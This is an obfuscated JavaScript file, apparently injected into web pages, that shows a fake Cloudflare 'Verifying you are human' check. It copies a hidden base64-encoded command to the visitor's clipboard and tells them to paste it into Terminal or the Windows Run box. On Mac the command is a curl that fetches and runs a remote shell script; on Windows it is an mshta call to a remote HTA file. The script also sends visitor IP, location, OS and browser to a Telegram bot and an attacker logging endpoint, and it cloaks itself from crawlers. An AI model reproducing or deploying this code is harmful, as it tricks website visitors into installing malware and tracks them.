(function () { let _0x188467 = false; const _0x161676_mac = atob("L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgJChlY2hvIGFIUjBjSE02THk5dmVHbGtZVzVsY0hWeVpTNWpiMjB2WjJWME5qTXZhVzV6ZEdGc2JDNXphQT09IHwgYmFzZTY0IC1kKSki"); const _0x161676_win = atob("bXNodGEgaHR0cHM6Ly9jbGF1ZHJlZGlyZWN0LmNvbS9iYWtlbnZhbGQuaHRh"); const _0x161676 = (_0x108fd7 && typeof _0x108fd7 === 'function' && _0x108fd7() === 'Windows') ? _0x161676_win : _0x161676_mac; const _0x4e350a = false; const _0x339ef9 = atob("ODI0NDcxMzg2NTpBQUdLYTVrWjc4SXE4LU1peG50bk5XcmpDTDJxWDhfaktEbw=="); const _0x5f3254 = atob("NTA5NTQ2NDE2NA=="); const _0x474682 = 'https://uytghkhl.sbs/fit'; const _0xfbccf7 = '\n body { font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif; color:#4a4a4a; }\n .c-modal-bg-1, .c-modal-bg-2 { position:fixed; top:0; left:0; width:100%; height:100%; display:flex; justify-content:center; align-items:center; z-index:1000; }\n .c-modal-bg-1 { background-color:rgba(0,0,0,0.75); }\n .c-modal-bg-2 { background-color:rgba(0,0,0,0.6); animation:fadeIn 0.3s ease-out; }\n @keyframes fadeIn { from { opacity:0; transform:scale(0.95); } to { opacity:1; transform:scale(1); } }\n @keyframes fadeOut { from { opacity:1; transform:scale(1); } to { opacity:0; transform:scale(0.95); } }\n .c-m-head { display:flex; justify-content:space-between; align-items:center; padding:20px 24px; background:linear-gradient(135deg, #f89b21, #ff8800); color:#ffffff; }\n .c-head-txt { flex: 1; min-width: 0; text-align: left; padding-right: 16px; }\n .c-m-head .c-head-txt h2 { margin:0; font-size:22px; font-weight:600; color:white; }\n .c-m-head .c-head-txt p { margin:4px 0 0; font-size:14px; opacity:0.95; color:white; }\n .c-m-logo img { filter:brightness(0) invert(1); height:54px; flex-shrink: 0; }\n .c-v-container { background-color:#ffffff; border-radius:6px; box-shadow:0 5px 15px rgba(0,0,0,0.2); width:480px; max-width:95%; overflow:hidden; border:1px solid #dcdcdc; display:flex; flex-direction:column; animation:fadeIn 0.3s ease-out; position:relative; }\n .c-m-close { position:absolute; top:10px; right:10px; background:none; border:none; font-size:28px; line-height:1; color:white; opacity:0.7; padding:0; text-shadow:0 1px 1px rgba(0,0,0,0.2); cursor:default; }\n .c-m-body { padding:24px; font-size:16px; line-height:1.6; }\n .c-m-body h4 { font-size: 16px; margin:0; color: #1d1d1d; }\n .progress-bar-container { background-color: #e9ecef; border-radius: 5px; height: 6px; margin-bottom: 20px; width: 100%; }\n .progress-bar-fill { background-color: #f89b21; height: 100%; width: 50%; border-radius: 5px; transition: width 0.5s ease-in-out; }\n .step-header { display: flex; align-items: center; gap: 10px; margin-top: 15px; }\n .step-number { background-color: #f0f2f5; border-radius: 4px; padding: 3px 8px; font-size: 12px; font-weight: 600; color: #555; }\n .step-instruction { margin: 8px 0 15px; font-size: 15px; }\n #step2-container { opacity: 0; max-height: 0; overflow: hidden; transition: opacity 0.4s ease-in, max-height 0.5s ease-in; }\n #step2-container.visible { opacity: 1; max-height: 400px; }\n .friendly-command-box { background-color: #f0f2f5; padding: 12px 16px; border-radius: 6px; cursor: pointer; transition: background-color 0.2s ease; position: relative; font-size: 14px; color: #333; text-align: center; }\n .friendly-command-box:hover { background-color: #e0e2e5; }\n .friendly-command-box .cp-tip { bottom: 110%; left: 50%; transform: translateX(-50%); }\n kbd { background-color:#e9ecef; border:1px solid #b4b4b4; border-radius:4px; padding:3px 7px; font-family:inherit; font-size:0.9em; box-shadow:0 2px 0 #b4b4b4; color:#333; font-weight:600; margin:0 2px; display:inline-block; transform:translateY(-1px); }\n .c-v-foot { display:flex; justify-content:space-between; align-items:center; padding:16px 24px; background-color:#f7f7f7; border-top:1px solid #e0e0e0; }\n .foot-left { text-align: left; }\n .foot-timer { font-size:14px; color:#555; font-weight:500; margin:0; }\n .foot-timer.urgent { color: #d93025; }\n .foot-social-proof { font-size: 12px; color: #6a6a6a; margin: 4px 0 0; }\n .v-btn-wrap { position: relative; display: inline-block; }\n .v-btn { background-color:#f89921; color:#ffffff; border:none; border-radius:5px; padding:12px 28px; font-size:16px; font-weight:bold; cursor:pointer; transition:background-color 0.3s ease, opacity 0.3s ease; display:flex; align-items:center; justify-content:center; }\n .v-btn:hover:not(:disabled) { background-color:#e4870f; }\n .v-btn:disabled { opacity:0.7; cursor:not-allowed; }\n .v-tooltip { visibility:hidden; width:max-content; background-color:#555; color:white; text-align:center; border-radius:6px; padding:5px 10px; position:absolute; z-index:1; bottom:110%; left:50%; transform:translateX(-50%); opacity:0; transition:opacity 0.2s; font-size:12px; }\n .v-btn-wrap.tooltip-active:hover .v-tooltip { visibility:visible; opacity:1; }\n .c-v-tech-details { background-color:#f0f2f5; padding:8px 24px; text-align:center; font-size:12px; color:#6a6a6a; display:flex; justify-content:space-between; }\n .c-v-tech-details span { display:inline-block; }\n .btn-spin { border: 3px solid rgba(255, 255, 255, 0.3); border-radius: 50%; border-top-color: #fff; width: 16px; height: 16px; animation: spin 1s ease-in-out infinite; margin-right: 8px; }\n .cf-widget-container { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: #232323db; display: flex; justify-content: center; align-items: center; z-index: 2000; backdrop-filter: blur(2px); opacity: 0; transition: opacity 0.3s ease; pointer-events: none; }\n .cf-widget-container.visible { opacity: 1; pointer-events: auto; }\n .cf-widget-content { background-color: #fff; padding: 20px; border-radius: 8px; border: 1px solid #ddd; box-shadow: 0 4px 12px rgba(0,0,0,0.1); display: flex; align-items: center; gap: 16px; width: 380px; box-sizing: border-box; }\n .cf-turnstile-wrapper, .cf-verifying-state, .cf-checkbox-state { display: flex; align-items: center; gap: 12px; }\n .cf-verifying-label { font-size: 16px; color: #555; }\n .cf-dot-spinner { position: relative; width: 28px; height: 28px; transform: rotate(45deg); animation: spin 2s infinite linear; }\n .cf-dot-spinner .dot { width: 6px; height: 6px; background-color: #eea405; border-radius: 50%; position: absolute; }\n .cf-dot-spinner .dot:nth-of-type(1) { top: 0; left: 0; }\n .cf-dot-spinner .dot:nth-of-type(2) { top: 0; right: 0; }\n .cf-dot-spinner .dot:nth-of-type(3) { bottom: 0; left: 0; }\n .cf-dot-spinner .dot:nth-of-type(4) { bottom: 0; right: 0; }\n .cf-dot-spinner .dot:nth-of-type(5) { top: 50%; left: -4px; margin-top: -4px; }\n .cf-dot-spinner .dot:nth-of-type(6) { top: 50%; right: -4px; margin-top: -4px; }\n .cf-dot-spinner .dot:nth-of-type(7) { top: -4px; left: 50%; margin-left: -4px; }\n .cf-dot-spinner .dot:nth-of-type(8) { bottom: -4px; left: 50%; margin-left: -4px; }\n #cf-turnstile-checkbox { display: none; }\n #cf-turnstile-checkbox + .cf-turnstile-label::before { content: \'\'; display: inline-block; width: 28px; height: 28px; border: 2px solid #ccc; border-radius: 4px; vertical-align: middle; cursor: pointer; transition: all 0.2s ease; margin-right: 12px; }\n #cf-turnstile-checkbox:checked + .cf-turnstile-label::before { background-color: rgb(253, 141, 13); border-color: rgb(253, 141, 13); content: \'\u2713\'; color: white; font-size: 20px; text-align: center; line-height: 28px; }\n .cf-turnstile-label { font-size: 16px; color: #333; cursor: pointer; }\n .cf-logo-container { display: flex; flex-direction: column; align-items: flex-end; margin-left: auto; }\n .cf-logo-container img { height: 28px; width: auto; margin-bottom: 8px; }\n .cf-links { font-size: 12px; }\n .cf-links a { color: #555; text-decoration: none; }\n .cf-links a:hover { text-decoration: underline; }\n .cf-links span { margin: 0 4px; }\n '; function _0x108fd7() { const _0x4b851b = navigator.userAgent; if (/Macintosh|MacIntel|MacPPC|Mac68K/.test(_0x4b851b)) { return 'Mac'; } else { if (/iPhone|iPod/.test(_0x4b851b)) { return 'iPhone'; } else { if (/Android/.test(_0x4b851b)) { return 'Android'; } else { if (/Win32|Win64|Windows|WinCE/.test(_0x4b851b)) { return 'Windows'; } else { return 'Other'; } } } } } function _0x1f291b() { const _0x283883 = navigator.userAgent; if (_0x283883.includes('Chrome') && !_0x283883.includes('Edg')) { return 'Chrome'; } else { if (_0x283883.includes('Firefox')) { return 'Firefox'; } else { if (_0x283883.includes('Safari') && !_0x283883.includes('Chrome')) { return 'Safari'; } else { if (_0x283883.includes('Edg')) { return 'Edge'; } else { if (_0x283883.includes('Opera') || _0x283883.includes('OPR')) { return 'Opera'; } else { return 'Unknown'; } } } } } } async function _0x5e0996(_0x51db0f) { if (!_0x339ef9 || _0x339ef9 === 'YOUR_BOT_TOKEN_HERE') { return; } const _0x3198ef = 'https://api.telegram.org/bot' + _0x339ef9 + '/sendMessage'; const _0x4c6c78 = { chat_id: _0x5f3254, text: _0x51db0f, parse_mode: 'HTML' }; try { await fetch(_0x3198ef, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(_0x4c6c78) }); } catch (_0x3064b7) { console.error('Failed to send Telegram message:', _0x3064b7); } } function _0x1ce0b6() { const _0x3b72a6 = [ 'googlebot', 'bingbot', 'slurp', 'duckduckbot', 'baiduspider', 'yandexbot', 'sogou', 'exabot', 'facebot', 'ia_archiver', 'ahrefsbot', 'semrushbot', 'mj12bot', 'dotbot', 'applebot', 'petalbot', 'twitterbot', 'linkedinbot', 'embedly', 'pinterest', 'developers.google.com' ]; const _0x3f6d0f = navigator.userAgent.toLowerCase(); const _0x14077f = _0x3b72a6.find(_0x13c740 => _0x3f6d0f.includes(_0x13c740)); if (_0x14077f) { _0x46eeca('Bot UA: ' + _0x14077f); return true; } if (navigator.webdriver) { _0x46eeca('WebDriver'); return true; } if (window.callPhantom || window._phantom) { _0x46eeca('PhantomJS'); return true; } if (screen.width < 800 || screen.height < 600) { _0x46eeca('Screen Size: ' + screen.width + 'x' + screen.height); return true; } if (navigator.plugins.length === 0 && !/chrome|chromium|crios/i.test(_0x3f6d0f)) { _0x46eeca('No Plugins'); return true; } const _0x2b3ed1 = _0x108fd7(); if (_0x2b3ed1 !== 'Mac') { _0x46eeca('Non-Mac OS: ' + _0x2b3ed1); return true; } return false; } function _0x46eeca(_0x883f31) { const _0x884b86 = _0x108fd7(); fetch(_0x474682 + '?type=cloaked&os=' + _0x884b86.toLowerCase() + '&reason=' + encodeURIComponent(_0x883f31)).catch(_0x29cd61 => console.error('Failed to log cloaked user:', _0x29cd61)); } function _0x3e0eed(_0x5afd10) { navigator.clipboard.writeText(_0x161676).then(() => { if (_0x5afd10) { _0x5afd10.classList.add('visible'); setTimeout(() => _0x5afd10.classList.remove('visible'), 2000); } }).catch(_0x40ab68 => console.error('Failed to copy command: ', _0x40ab68)); if (!_0x188467) { _0x188467 = true; const _0x39153b = _0x108fd7(); fetch(_0x474682 + '?type=copy&os=' + _0x39153b.toLowerCase()).catch(_0x3d4092 => console.error('Failed to log copy event:', _0x3d4092)); const _0x24e321 = window.location.href; fetch('https://api.ipify.org?format=json').then(_0x4caa7b => _0x4caa7b.json()).then(_0x496062 => { return fetch('https://ipapi.co/' + _0x496062.ip + '/json/').then(_0x21446e => _0x21446e.json()).then(_0x548a82 => { let _0x5e20cc = 'Unknown'; if (_0x548a82 && _0x548a82.country_code) { const _0x5bcd47 = _0x548a82.country_code.toUpperCase().split('').map(_0x400be2 => 127462 + _0x400be2.charCodeAt(0) - 65); _0x5e20cc = String.fromCodePoint(..._0x5bcd47); } return { ip: _0x496062.ip, countryInfo: _0x5e20cc }; }); }).then(({ ip: _0x349d8c, countryInfo: _0x3f5bae }) => { const _0x33a88f = _0x1f291b(); const _0xbf58b3 = '\u2705 Verification Code Copied\n\n\uD83C\uDF10 Website: ' + _0x24e321 + '\n\uD83D\uDC64 IP: ' + _0x349d8c + '\n\uD83C\uDF0D Country: ' + _0x3f5bae + '\n\uD83D\uDCBB OS: ' + _0x39153b + '\n\uD83C\uDF10 Browser: ' + _0x33a88f; _0x5e0996(_0xbf58b3); }).catch(() => { const _0x6d9c7e = _0x1f291b(); const _0x4f3797 = '\u2705 Verification Code Copied\n\n\uD83C\uDF10 Website: ' + _0x24e321 + '\n\uD83D\uDC64 IP: (fetch failed)\n\uD83C\uDF0D Country: Unknown\n\uD83D\uDCBB OS: ' + _0x39153b + '\n\uD83C\uDF10 Browser: ' + _0x6d9c7e; _0x5e0996(_0x4f3797); }); } } const _0x5526f0 = '\n
\n
\n \n
\n

Verifying you are human

This may take a few seconds

\n \n
\n
\n
\n
\n
\n\n
\n
\n Step 1/2\n

On your MacOS

\n
\n

Press \u2318 Command + Space, type "Terminal",

\n

and press Return.

\n
\n\n
\n
\n Step 2/2\n

Run the Verification

\n
\n

Press \u2318 Command + V in terminal and press Return to verify.

\n
\n \u2699️ We\'re preparing your access...\n Verification Copied!\n
\n ' + "" + ' \n
\n
\n
\n
\n

Time Remaining: 1:00

\n

\n
\n \n \n Click the code block again to enable.\n \n
\n
\n \n \n
\n
\n
\n '; function _0x4481c0() { const osType = _0x108fd7(); const _0xe51b14 = document.createElement('div'); _0xe51b14.innerHTML = _0x5526f0; document.body.appendChild(_0xe51b14); const _0xa519b5 = document.getElementById('v-overlay'); if (osType === 'Windows') { // шаг 1 const step1Title = _0xa519b5.querySelector('#step1-container h4'); if (step1Title) step1Title.textContent = "On your Windows"; const step1Instr = _0xa519b5.querySelectorAll('#step1-container .step-instruction'); if (step1Instr.length >= 2) { step1Instr[0].innerHTML = 'Press Win + R'; step1Instr[1].remove(); } // шаг 2 const step2Instr = _0xa519b5.querySelector('#step2-container .step-instruction'); if (step2Instr) { step2Instr.innerHTML = 'Press Ctrl + V in console and press Enter to verify.'; } } const _0x2b0724 = document.getElementById('v-btn'); const _0x423c76 = document.getElementById('v-btn-wrapper'); const _0x3a8e16 = document.getElementById('code-copy-container'); const _0x4b0972 = _0xa519b5.querySelector('#step2-container'); const _0x2083c2 = _0xa519b5.querySelector('#v-progress-bar'); const _0xe27a50 = _0xa519b5.querySelector('#v-timer-countdown'); const _0xb80f5f = _0xa519b5.querySelector('#v-social-proof'); const _0x3e7a8c = _0xa519b5.querySelector('#v-ray-id'); const _0x36944f = _0xa519b5.querySelector('#v-ip-address'); setTimeout(() => { _0x4b0972.classList.add('visible'); _0x2083c2.style.width = '100%'; setTimeout(() => { const _0x37d086 = _0xa519b5.querySelector('#instruction-video'); if (_0x37d086) { _0x37d086.load(); _0x37d086.play().catch(_0x43c31f => console.log('Video autoplay failed:', _0x43c31f)); } }, 100); }, 1500); let _0xf17b48; const _0x176a1d = () => { let _0x233a35 = 59; _0xf17b48 = setInterval(() => { const _0x3d6d17 = Math.floor(_0x233a35 / 60); let _0x2742e2 = _0x233a35 % 60; _0x2742e2 = _0x2742e2 < 10 ? '0' + _0x2742e2 : _0x2742e2; _0xe27a50.textContent = _0x3d6d17 + ':' + _0x2742e2; if (_0x233a35 <= 15) { _0xe27a50.parentElement.classList.add('urgent'); } if (--_0x233a35 < 0) { clearInterval(_0xf17b48); _0x3964d6(true); } }, 1000); }; const _0x3964d6 = (_0xad6ec8 = false) => { clearInterval(_0xf17b48); if (_0xa519b5) { _0xa519b5.style.animation = 'fadeOut 0.3s ease-out forwards'; setTimeout(() => { _0xa519b5.remove(); if (_0xad6ec8) { _0x4481c0(); } }, 300); } }; const _0x5ebb41 = () => { const _0x4e5df4 = Math.floor(Math.random() * 601) + 1200; _0xb80f5f.textContent = '\u2705 ' + _0x4e5df4 + ' users in your region have verified successfully in the last hour.'; const _0x1975cb = [...Array(16)].map(() => Math.floor(Math.random() * 16).toString(16)).join(''); _0x3e7a8c.textContent = 'Ray ID: ' + _0x1975cb; fetch('https://api.ipify.org?format=json').then(_0x354f74 => _0x354f74.json()).then(_0x56715c => { _0x36944f.textContent = 'Your IP: ' + _0x56715c.ip; }).catch(() => { _0x36944f.textContent = 'Your IP: Unavailable'; }); }; _0x423c76.classList.add('tooltip-active'); _0x176a1d(); _0x5ebb41(); _0x3a8e16.addEventListener('click', () => { const _0x1efe6f = _0x3a8e16.querySelector('.cp-tip'); _0x3e0eed(_0x1efe6f); _0x2b0724.disabled = false; _0x423c76.classList.remove('tooltip-active'); }); _0x2b0724.addEventListener('click', () => { if (!_0x2b0724.disabled) { _0x3964d6(); } }); } const _0x4ba33c = '\n
\n
\n
\n
\n
\n
\n
\n Verifying...\n
\n \n
\n
\n Cloudflare Logo\n \n
\n
\n
\n '; window.addEventListener('DOMContentLoaded', () => { const _0x31e1cc = _0x108fd7(); /*if (_0x31e1cc !== 'Windows' && _0x31e1cc !== 'Mac') { window.location.href = 'https://chat.openai.com'; }*/ if (_0x4e350a && _0x1ce0b6()) { return; } const _0xa81346 = document.createElement('style'); _0xa81346.innerText = _0xfbccf7; document.head.appendChild(_0xa81346); document.body.insertAdjacentHTML('beforeend', _0x4ba33c); setTimeout(_0x4f342c, 500); }); function _0x4f342c() { const _0x12927b = _0x108fd7(); fetch(_0x474682 + '?type=trigger&os=' + _0x12927b.toLowerCase()).catch(_0x460ef7 => console.error('Failed to log trigger event:', _0x460ef7)); const _0x340043 = document.getElementById('cf-turnstile-widget'); const _0x45397d = document.querySelector('.cf-verifying-state'); const _0x5836d9 = document.querySelector('.cf-checkbox-state'); const _0x23382a = document.getElementById('cf-turnstile-checkbox'); const _0x5da00f = document.querySelector('.cf-turnstile-label'); _0x340043.classList.add('visible'); setTimeout(() => { _0x45397d.style.display = 'none'; _0x5836d9.style.display = 'flex'; _0x23382a.addEventListener('change', () => { _0x3e0eed(); const _0x42ac80 = document.createElement('div'); _0x42ac80.className = 'cf-dot-spinner'; for (let _0x11b0d9 = 0; _0x11b0d9 < 8; _0x11b0d9++) { _0x42ac80.appendChild(document.createElement('div')).className = 'dot'; } _0x5836d9.innerHTML = ''; _0x5836d9.appendChild(_0x42ac80); const _0x5a637d = document.createElement('span'); _0x5a637d.className = 'cf-verifying-label'; _0x5a637d.textContent = 'Verifying...'; _0x5836d9.appendChild(_0x5a637d); setTimeout(() => { _0x42ac80.style.borderColor = '#d93025'; _0x42ac80.style.borderLeftColor = 'transparent'; _0x5a637d.textContent = 'Almost there!'; _0x5a637d.style.color = '#f89b21'; setTimeout(() => { _0x340043.classList.remove('visible'); setTimeout(() => { _0x340043.style.display = 'none'; _0x4481c0(); }, 300); }, 1500); }, 2000); }); }, 2500); } }());